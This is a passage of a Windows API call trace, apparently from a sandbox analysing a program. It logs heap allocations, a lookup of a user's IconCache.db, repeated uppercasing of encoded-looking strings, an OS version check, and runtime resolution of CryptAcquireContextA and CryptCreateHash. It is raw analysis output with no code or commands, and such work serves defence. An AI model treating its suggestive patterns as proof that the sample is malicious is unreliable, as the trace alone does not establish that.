(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0168.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0168.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0168.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0168.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0168.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0168.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0168.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0168.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0168.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0168.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0168.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0168.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0168.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0168.708] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0168.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0168.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0168.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0168.709] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0168.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0168.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0168.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0168.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0168.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0168.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0168.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0168.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0168.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0168.710] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/IconCache.db", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4a3b706e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4a3b706e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd17602f9, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x13141, dwReserved0=0x0, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 0x9e1cb8 [0168.710] FindClose (in: hFindFile=0x9e1cb8 | out: hFindFile=0x9e1cb8) returned 1 [0168.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0168.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0168.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0168.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0168.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0168.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0168.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0168.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0168.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0168.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0168.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0168.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0168.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0168.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0168.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0168.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0168.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0168.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0168.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0168.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0168.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0168.713] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0168.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0168.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0168.714] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0168.714] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0168.714] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0168.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0168.715] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.715] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0168.716] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0168.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0168.716] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0168.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0168.716] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.716] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.717] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0168.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0168.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0168.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7220, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0168.717] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf330) returned 1 [0168.718] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0168.718] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0168.718] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0168.718] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0168.718] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0168.718] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0168.718] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0168.718] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0168.718] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.730] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.730] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0168.730] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0168.730] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.730] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.730] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0168.730] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0168.730] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", 